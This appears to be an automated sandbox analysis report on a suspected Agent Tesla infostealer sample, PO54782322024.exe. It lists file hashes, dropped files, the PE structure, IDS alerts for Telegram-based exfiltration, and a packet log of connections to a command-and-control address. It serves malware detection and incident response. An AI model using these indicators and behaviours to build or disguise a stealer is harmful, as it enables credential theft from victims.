                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.4.<./.P.i.
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4828
                                                                                      Entropy (8bit):4.510914800186966
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsZOJg771I9M/WpW8VYmYm8M4JwnzpE6FSFyq8v2pE6Tt070f3d:uIjfiI7Xu7VWJwnzaBW2a6Tt070f3d
                                                                                      MD5:B5E2FAB40A2DD7FE334E2C29D2E0A630
                                                                                      SHA1:DABAC44FE17EF7A5C0AC45BC5C8C9086B5EC5097
                                                                                      SHA-256:78796A9E6698790B8DDC745D4C48432A366912E931EF8E0EBBB342096178022C
                                                                                      SHA-512:93E3C3281AEC8A59BCF79FCCB0B732DCF18A8158DAA19BB1C0A7208005E5B9C0B1A52A65FD54A0B42CBC2D93B0453EB7A0873887D678C5066754C378402E0C88
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):142
                                                                                      Entropy (8bit):5.090621108356562
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:modified
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):45984
                                                                                      Entropy (8bit):6.16795797263964
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: m30zZYga23.exe, Detection: malicious, Browse
                                                                                      • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                      • Filename: AWB#150332.exe, Detection: malicious, Browse
                                                                                      • Filename: SOA_9828392091.exe, Detection: malicious, Browse
                                                                                      • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                                                      • Filename: Pi648je050.exe, Detection: malicious, Browse
                                                                                      • Filename: shipping documents.exe, Detection: malicious, Browse
                                                                                      • Filename: Termination_List_November_2024_pdf.exe, Detection: malicious, Browse
                                                                                      • Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious, Browse
                                                                                      • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.465619282713566
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:lIXfpi67eLPU9skLmb0b4MWSPKaJG8nAgejZMMhA2gX4WABl0uNKdwBCswSbd:GXD94MWlLZMM6YFH0+d
                                                                                      MD5:D934880A3CDFD6E462FF70D932ECE3CF
                                                                                      SHA1:049151548B3B3700E0845F0F7F207EC55836ACCC
                                                                                      SHA-256:2C8BD2494F06251420CAAA34CD0E8B445CCB486DAE04179E292F16DFF45CD8D9
                                                                                      SHA-512:CB7E9101B054B600180D582BC8804BCBD86EC8C0F0E074ABD78A2EE7C704B5FF3D293EC561573F905862C910A711791DB3A046D2A382ECAA658B25122B1F84AB
                                                                                      Malicious:false
                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2$.n.G.................................................................................................................................................................................................................................................................................................................................................Z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1141
                                                                                      Entropy (8bit):4.442398121585593
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                                      Malicious:false
                                                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                                                      File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.996507179094833
                                                                                      TrID:
                                                                                      • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                      • Win64 Executable Console (202006/5) 47.64%
                                                                                      • Win64 Executable (generic) (12005/4) 2.83%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                      • DOS Executable Generic (2002/1) 0.47%
                                                                                      File name:PO54782322024.exe
                                                                                      File size:528'896 bytes
                                                                                      MD5:5dc11c53470282ca41404226ead4eccd
                                                                                      SHA1:dc93ee506654c5fd14a6c0c851609e1d5aa7ac52
                                                                                      SHA256:676869eec66690665e5a88c85636f738ad095b408973787420c3a1472b5bd482
                                                                                      SHA512:e46f9cad869694d3e1da785a3ca3829e7177e70d35bad2abd7d30dbdb95d3f7f6138e6e523d8524a915d4fba38c00dd36707ccf4eabe0d95c8b74a356d6f3607
                                                                                      SSDEEP:12288:gGm6FeaFQEfSguIZ12JxgvMD4RfCIcNVrHqPZt5:5eqsjIiFD4Re9Kxz
                                                                                      TLSH:3AB42304CED5D062C39D87F20C6357C62475D28388B1DEEE66989F90E210F9AE9F72E5
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...R.Pg.........."...0.l................ ....@...... .......................@............`................................
                                                                                      Icon Hash:90cececece8e8eb0
                                                                                      Entrypoint:0x400000
                                                                                      Entrypoint Section:
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows cui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67508452 [Wed Dec 4 16:33:22 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:
                                                                                      Instruction
                                                                                      dec ebp
                                                                                      pop edx
                                                                                      nop
                                                                                      add byte ptr [ebx], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax+eax], al
                                                                                      add byte ptr [eax], al
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x7f368.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x1b6c0x1c00e7128aeddd6621e4dceb81f36e883de4False0.6279296875data5.942798791059208IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x40000x7f3680x7f4003f8021ed1bc16f215c1b2cbddf8b08ffFalse0.9990080887770137data7.999404607550849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      M4LWARE0x41100x7ee18data1.0003194125887043
                                                                                      RT_VERSION0x82f280x254data0.45805369127516776
                                                                                      RT_MANIFEST0x8317c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-06T05:51:00.581471+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449732149.154.167.220443TCP
                                                                                      2024-12-06T05:51:00.581471+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449732149.154.167.220443TCP
                                                                                      2024-12-06T05:51:00.831670+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449732TCP
                                                                                      2024-12-06T05:51:02.936121+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449734149.154.167.220443TCP
                                                                                      2024-12-06T05:51:03.684238+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449734TCP
                                                                                      2024-12-06T05:52:28.583138+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449818149.154.167.220443TCP
                                                                                      2024-12-06T05:52:28.772328+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449817149.154.167.220443TCP
                                                                                      2024-12-06T05:52:28.772328+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449817149.154.167.220443TCP
                                                                                      2024-12-06T05:52:29.005002+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449817TCP
                                                                                      2024-12-06T05:52:40.926692+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449849149.154.167.220443TCP
                                                                                      2024-12-06T05:52:46.661125+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449861149.154.167.220443TCP
                                                                                      2024-12-06T05:52:54.442325+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449882149.154.167.220443TCP
                                                                                      2024-12-06T05:53:05.473843+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449909149.154.167.220443TCP
                                                                                      2024-12-06T05:53:06.645593+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449915149.154.167.220443TCP
                                                                                      2024-12-06T05:53:08.911100+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449921149.154.167.220443TCP
                                                                                      2024-12-06T05:53:21.770591+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449948149.154.167.220443TCP
                                                                                      2024-12-06T05:53:29.180396+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449968149.154.167.220443TCP
                                                                                      2024-12-06T05:53:30.536070+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449969149.154.167.220443TCP
                                                                                      2024-12-06T05:53:42.317431+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450000149.154.167.220443TCP
                                                                                      2024-12-06T05:53:45.155874+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450006149.154.167.220443TCP
                                                                                      2024-12-06T05:54:13.020937+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450028149.154.167.220443TCP
                                                                                      2024-12-06T05:54:19.802464+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450029149.154.167.220443TCP
                                                                                      2024-12-06T05:54:24.505235+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450030149.154.167.220443TCP
                                                                                      2024-12-06T05:54:31.745983+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450031149.154.167.220443TCP
                                                                                      2024-12-06T05:54:34.114569+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450032149.154.167.220443TCP
                                                                                      2024-12-06T05:54:39.286315+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450034149.154.167.220443TCP
                                                                                      2024-12-06T05:54:55.304892+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450035149.154.167.220443TCP
                                                                                      2024-12-06T05:55:02.124151+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450036149.154.167.220443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 6, 2024 05:50:56.317807913 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:56.317838907 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:56.317919016 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:56.326634884 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:56.326647997 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.543462038 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.543600082 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:57.545839071 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:57.545845985 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.546056986 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.597704887 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:57.598145962 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:57.643328905 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.982675076 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.982721090 CET44349730172.67.74.152192.168.2.4
                                                                                      Dec 6, 2024 05:50:57.982774019 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:57.989160061 CET49730443192.168.2.4172.67.74.152
                                                                                      Dec 6, 2024 05:50:58.593467951 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:50:58.593511105 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:50:58.593626022 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:50:58.593936920 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:50:58.593952894 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:50:59.960396051 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:50:59.960474014 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:50:59.975923061 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:50:59.975939989 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:50:59.976146936 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:50:59.984756947 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.027337074 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.332951069 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.332973957 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.581479073 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.628961086 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.830986977 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.831394911 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.831439972 CET44349732149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.831489086 CET49732443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.882697105 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.882725954 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:00.882802010 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.883018970 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:00.883030891 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.311619997 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.311681986 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:02.312839985 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:02.312848091 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.313071966 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.319504976 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:02.367331982 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.678054094 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:02.678092957 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.936125994 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:02.988331079 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:03.683883905 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:03.684148073 CET44349734149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:51:03.684206963 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:51:03.684638023 CET49734443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.779385090 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.779422998 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:26.779567003 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.783598900 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.783611059 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:26.839596033 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.839631081 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:26.839746952 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.840229988 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:26.840244055 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.147039890 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.158091068 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.158117056 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.228877068 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.230529070 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.230547905 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.504375935 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.504401922 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.582762957 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.582793951 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.582932949 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.582947016 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.583086014 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.583100080 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.772353888 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.816709042 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:28.851726055 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:28.895608902 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:29.004770994 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:29.004903078 CET44349817149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:29.007647991 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:29.008013010 CET49817443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:29.495659113 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:29.498116970 CET44349818149.154.167.220192.168.2.4
                                                                                      Dec 6, 2024 05:52:29.498249054 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:29.499598980 CET49818443192.168.2.4149.154.167.220
                                                                                      Dec 6, 2024 05:52:39.205630064 CET49849443192.168.2.4149.154.167.220
